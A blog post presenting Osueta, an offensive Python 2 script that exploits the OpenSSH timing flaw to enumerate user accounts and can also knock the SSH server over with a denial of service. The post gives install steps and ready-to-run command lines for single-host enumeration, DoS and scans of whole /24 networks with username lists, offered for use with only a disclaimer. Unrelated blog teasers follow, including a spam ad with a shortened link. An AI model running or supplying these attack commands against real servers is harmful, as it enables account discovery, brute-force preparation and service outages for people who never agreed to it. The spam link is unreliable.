Skip to main content

Osueta: A Simple Python Script To Exploit The OpenSSH User Enumeration Timing Attack

By admin

About Osueta?
   Osueta it's a simple Python 2 script to exploit the OpenSSH User Enumeration Timing Attack, present in OpenSSH versions <= 7.2 and >= 5.*. The script has the ability to make variations of the username employed in the bruteforce attack, and the possibility to establish a DoS condition in the OpenSSH server.

    Read more: OpenSSH User Enumeration Time-Based Attack

   The bug was corrected in OpenSSH version 7.3.

   Authors of Osueta:

Osueta's Installation
   For Linux users, open your Terminal and enter these commands:
   If you're Windows users, follow these steps:
  • Install Python 2.7.x from Python.org first. On Install Python 2.7.x Setup, choose Add python.exe to Path.
  • Download Osueta-master zip file.
  • Then unzip it.
  • Open CMD or PowerShell window at the Osueta folder you have just unzipped and enter these commands:
    pip install python-nmap paramiko IPy
    python osueta.py -h

Advice: Like others offensive tools, the authors disclaims all responsibility in the use of this script.

Osueta help menu:

Osueta's examples:
   A single user enumeration attempt with username variations:
python2 osueta.py -H 192.168.1.6 -p 22 -U root -d 30 -v yes

   A single user enumeration attempt with no user variations a DoS attack:
python2 osueta.py -H 192.168.1.6 -p 22 -U root -d 30 -v no --dos yes

   Scanning a C class network with only one user:
python2 osueta.py -H 192.168.1.0/24 -p 22 -U root -v no 

   Scanning a C class network with usernames from a file, delay time 15 seconds and a password of 50000 characters:
python2 osueta.py -H 192.168.1.0/24 -p 22 -L usernames.txt -v yes -d 15 -l 50

Related links


Comments

Post a Comment

Popular posts from this blog

דף הבית | הטכניון - מכון טכנולוגי לישראל

By admin
https://technion.ac.il http://library.technion.ac.il/he https://www.technion.ac.il/%D7%A8%D7%A9%D7%99%D7%9E%D7%AA-%D7%94%D7%A4%D7%A7%D7%95%D7%9C%D7%98%D7%95%D7%AA-2/ http://www.admin.technion.ac.il/dpcalendar/ https://www.technion.ac.il/%D7%94%D7%A0%D7%94%D7%9C%D7%94-%D7%91%D7%9B%D7%99%D7%A8%D7%94/ https://www.technion.ac.il/%D7%A1%D7%9E%D7%99%D7%A0%D7%A8%D7%99%D7%9D/ https://dean.web.technion.ac.il/%D7%A7%D7%9E%D7%A4%D7%95%D7%A1-%D7%AA%D7%95%D7%A1%D7%A1/ http://www.dmag.co.il/pub/technion/tmag.html http://moodle.technion.ac.il/ https://tender-logistics.web3.technion.ac.il http://cis.technion.ac.il/ http://video.technion.ac.il/ https://portal.technion.ac.il/irj/portal https://www.technion.ac.il/ https://www.technion.ac.il/en/home-2/ http://arabic.net.technion.ac.il https://www.technion.ac.il/%d7%97%d7%96%d7%95%d7%9f-%d7%94%d7%98%d7%9b%d7%a0%d7%99%d7%95%d7%9f/ https://www.technion.ac.il/%d7%94%d7%99%d7%a1%d7%98%d7%95%d7%a8%d7%99%d7%99%d7%aa-%d7%94%d7%98%d7%9b%d7%a0%d7%99%d7%95%d7%9f/ ht...
Post a Comment
Read more

Gu Energy Gel for Sale

By admin
Get Gu Energy Gel Here - https://bit.ly/3f97Wvz _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
Post a Comment
Read more

To Kilinochchi or Mankulam?- The Nation- 2008/09/07

By admin
This week saw one of the most ferocious battles since the security forces started their campaign to regain the Wanni around mid last year. The LTTE’s much anticipated counter strike was launched along their newly built trench line from the western coastal town Nachchikudah to the deep interior region Akkarayankulam, a fair distance of 18-20 km in length. This trench line, which is mainly an earth bund of around 7-15 feet at certain places, was built in recent times with heavy machinery cutting across shrub jungles. In a series of waves, the LTTE attacked personnel of the Army’s 58 and 57 Divisions last Wednesday in a battle that lasted 36 hours. The LTTE claimed to have killed up to 100 military personnel, while the military initially claimed that only nine soldiers were killed. However, with the LTTE claiming that they had recovered the bodies of 29 soldiers and posted pictures of the dead on pro-LTTE websites, the Army said that ...
3 comments
Read more